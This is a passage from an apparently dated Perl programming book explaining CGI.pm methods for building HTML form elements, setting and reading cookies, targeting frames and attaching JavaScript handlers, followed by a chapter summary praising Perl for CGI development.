-name is a parameter containing the name of the check box; it is the only required parameter. The check box's name is also used as a readable label next to the check box itself, unless -label specifies otherwise. -checked is set to checked if it is to be checked by default. -value specifies the value of the check box when checked. -label specifies what should appear next to the check box.

Check Box Groups

checkbox_group(), shown here, is the method you use to create a number of check boxes that are logically linked together and whose behavior can be affected by the other boxes.

print $cgi->checkbox_group(     -name=>'group_name',
                              -values=>['uno', 'dos', 'tres'],
                             -default=>'dos',
                           -linebreak=>'true',
                              -labels=>\%labels);

-name and -values, which are required, function just as they do for standalone check boxes. All other parameters are optional. -default is either a list of values or the name of a single value to be checked by default. If -linebreak is set to true, linebreaks are placed between each check box, making them appear in a vertical list. Otherwise, they are listed right next to each other on the same line. -labels is an associative array of labels for each value, just as in pop-up menus. If -nolabels is specified, no labels are printed next to the buttons.

If you want to generate an html3 table with your check boxes in it, you can do so by using the -rows and -columns parameters. If these parameters are set, all the check boxes in the group are put into an html3 table that uses the number of rows and columns specified. If you like, you can omit -rows, and the correct number is calculated for you (based on the value you specify in -columns). Additionally, you can use -rowheaders and -colheaders parameters to add headings to your rows and columns. Both of these parameters like to be fed a pointer to an array of headings. They are purely decorative; they don't change how your check boxes are interpreted.

print $cgi->checkbox_group(  -name=>'group_name',
                           -values=>['sun', 'sgi', 'ibm', 'dec'],
                             -rows=>2, -columns=>2);

Radio Button Groups

You use the radio_group() method to create logical groups of radio buttons. Turning on one button in a radio group turns off all the others. As a result, -default accepts only a single value (instead of a list, as it can with check box groups). Otherwise, the methods for radio button groups are the same as for check box groups.

Submit Buttons

Forms are pretty useless unless you can submit them. So, the CGI module provides the submit() method, which is shown here. Available parameters are -name and -value. -name associates a name to a specific button. (This capability is useful when you have multiple buttons on the same page and want to differentiate them.) -value is what is passed to your program in the query string, and also appears as a label for the submit button. Both parameters are optional.

print $cgi->submit( -name=>'button_name',
                   -value=>'value');

Reset Buttons

Reset buttons are straightforward: clicking the reset button undoes whatever changes the user has made to the form and presents a fresh one for mangling.

print $cgi->reset;

Defaults Buttons

The defaults() method, shown here, resets a form to its defaults. This method is different from reset(), which just undoes whatever changes the user has made by typing in the fields. Reset buttons do not override query strings, but defaults buttons do. This difference between the two is small but important. If an argument is given, it is used as the label for the button. Otherwise, the button is labeled Defaults.

print $cgi->defaults('button_label');

Hidden Fields

The hidden() method, shown here, produces a text field that's invisible to the user. This capability is useful for passing form data from one form to another, when you don't want to clutter up the screen with information that the user doesn't need to see every time.

print $cgi->hidden(   -name=>'field_name',
                   -default=>['value1', 'value2', 'value3']);
Both parameters must be given. As in other cases, the second can be 
an anonymous array or a reference to a named array.
Clickable Image Buttons
So you aren't satisfied to have plain old hypertext as your link? Want to 
use an image instead? Then use the image_button() method as follows:
print $cgi->image_button( -name=>'button_name',
                           -src=>'/images/clickMe.gif',
                         -align=>'middle',
                           -alt=>'Click Me!');

When you use image_button(), only -name and -src are required. When the image is clicked, not only is the form submitted, but the x and y coordinates indicating where the image was clicked are also submitted via two parameters: button_name.x and button_name.y.

JavaScript Buttons

button(), shown here, creates a JavaScript button. This means that JavaScript code referenced in -onClick is executed. Note that this method doesn't work at all if the browser doesn't understand JavaScript, if the browser has this feature turned off, or if the browser is behind a firewall that filters out JavaScript.

print $cgi->button(   -name=>'big_red_button',
                     -value=>'Click Me!',
                   -onClick=>'doButton(this)');

Additional Considerations

Sometimes using Perl's print statement to send straight HTML to the client is just better. An example might be when you're implementing a table that contains information read from a file. It's probably better to use print to open the <TABLE> tag, use the methods to return the contents of the table, and then another print to close the table. Doing absolutely everything from a CGI method might be preferred by an object purist, but in practice, sometimes sticking a print statement with raw HTML in your program just makes more sense (from the standpoints of simplicity and readability).

Because the CGI modules are continually being enhanced, be sure to check the CGI.pm documentation for the complete list of methods, parameters, and features. You can find the documentation on the Web at

http://www.genome.wi.mit.edu/ftp/pub/software/WWW/cgi_docs.html

Netscape Cookies

Using cookies is another way to maintain state information. A cookie is simply a bit of data that contains a number of name/value pairs passed between the client and the server in the HTTP header rather than in the query string. In addition to name/value pairs, several other optional attributes exist.

The following is a sample cookie that demonstrates how to use the method:

$my_cookie = $cgi->cookie(   -name=>'myBigCookie',
                            -value=>'chocolate chip',
                          -expires=>'+5y',
                             -path=>'/cgi-bin',
                           -domain=>'.example.com',
                           -secure=>1);

     print $cgi->header(-cookie=>$my_cookie);

The cookie() method creates a new cookie. Its parameters are as follow:

-name
This required parameter identifies the cookie.
-value
This parameter indicates the cookie's value. It can be a scalar value, array reference, or associative array reference.
-path
This parameter indicates the partial path in which the cookie is valid.
-domain
This parameter indicates the partial domain for which the cookie is valid.
-expires
This parameter indicates the expiration date for the cookie. The format is the same as described in the HTTP headers section.
-secure
If this parameter is set to 1, the cookie is used only in an SSL session.
Cookies created with the cookie() method must be sent in the HTTP header via the header() method as follows:

      print $cgi->header(-cookie=>$my_cookie);

You can send multiple cookies by passing an array reference to header(), naming each cookie to be sent:

print $cgi->header(-cookie=>[$cookie1, $cookie2]);
To retrieve a cookie, you can request it by name using the cookie() method without 
the -value parameter:
use CGI;
     $cgi = new CGI;
     $stuff = $query->cookie(-name=>'stuff');

To delete a cookie, send a blank cookie with the same name as the one you want to delete, and specify the expiration date to something in the past.

Note that cookies have some limitations. The client cannot store more than 300 cookies at any one time. Each cookie cannot be any longer than four kilobytes, including its name. No more than 20 cookies can be specified per domain.

Netscape Frames

You can support frames from within CGI.pm in two ways:

Direct the output of a program into a frame with the specified name, as follows. If the named frame doesn't exist, a new window pops up with the specified code in it.

        $cgi = new CGI;
                  print $cgi->header(-target=>'_myFrame');

Provide the frame's name as an argument to the -target parameter using the start_form() method:

        print $cgi->start_form(-target=>'another_frame');

Because using frames well can be difficult, splitting the program into logical sections is often best. For example, if a page has multiple frames, making one part of the program create the frames and having a separate section of the program handle each frame might be best.

JavaScript

JavaScript is a useful interpreted language that runs inside the browser. It was introduced in Netscape version 2 as "LiveScript," but its name was almost immediately changed to JavaScript, and it was made to look similar to Java. Having code execute on the client side is nice, especially for CGI purposes, because you can perform tasks such as form validation on the client side, forcing the load of user-interface-oriented tasks to be processed on the client (where it belongs) rather than on your server (where it doesn't).

Again, using the JavaScript features of CGI.pm requires that you know JavaScript. JavaScript events are available only in cases in which they are applicable.

To register a JavaScript event handler with an HTML element, simply name the appropriate parameter, and pass it any arguments you need when calling the CGI method. For example, if you want to have a text field's contents be validated as soon as a user makes a change to it, you can do so this way:

print $q->textfield(    -name=>'height',
                    -onChange=>"validateHeight(this)");

Of course, for this approach to work, validateHeight() must be an existing function. You make it an existing function by incorporating it in a <SCRIPT> block by using the -script parameter to the start_html method.

Summary

Perl is an excellent language for writing CGI applications. Given its flexibility, speed, portability, and the wealth of CGI-related Perl resources available, there is very little that can't be done. Perl is used to develop the vast majority of CGI programs on the web, and after seeing how well Perl does the job, it's easy to see why.

CGI programming is a powerful and fun way to accomplish many of the tasks relating to allowing users to interact with huge amounts of data. Information can be as dynamic or as static as you like.

As the Web becomes closer to the long-sought dream of an easy-to-use, ubiquitous user interface, using CGI to look at data makes sense rather than using the proprietary interfaces that typically exist. Because CGI is a program running on your server, though, it typically has access to data that you might not want to give to everyone. (For example, a corporate network might have a CGI interface to a certain subset of an employee database, which might also include information such as payroll, social security numbers, and so on that shouldn't be "public" knowledge.) Therefore, you need to take some precautions related to security, just to make sure that your program won't be tricked into giving out sensitive information that it otherwise wouldn't give.

The Perl community is one of the most helpful on the Net. Regardless of whether you're just learning to program or are already a wizard, a plethora of people on the comp.lang.perl.* newsgroups are willing to help you solve any problems that you're confronted with. (They won't write the programs for you, for the most part, but they'll do more than that: they'll help you figure out how to solve your own problems. So the next time, you won't have to ask anyone.) Do your part to keep the community like it is: When you see that someone is asking a question, and you can provide some help, do so. If you've written a useful module, share it.

Because of Perl's powerful regular expressions, object-oriented capabilities, and the huge library of free Perl modules to handle interfaces to various databases, CGI, encryption systems, and so on, Perl is a great language for safe and powerful CGI programming.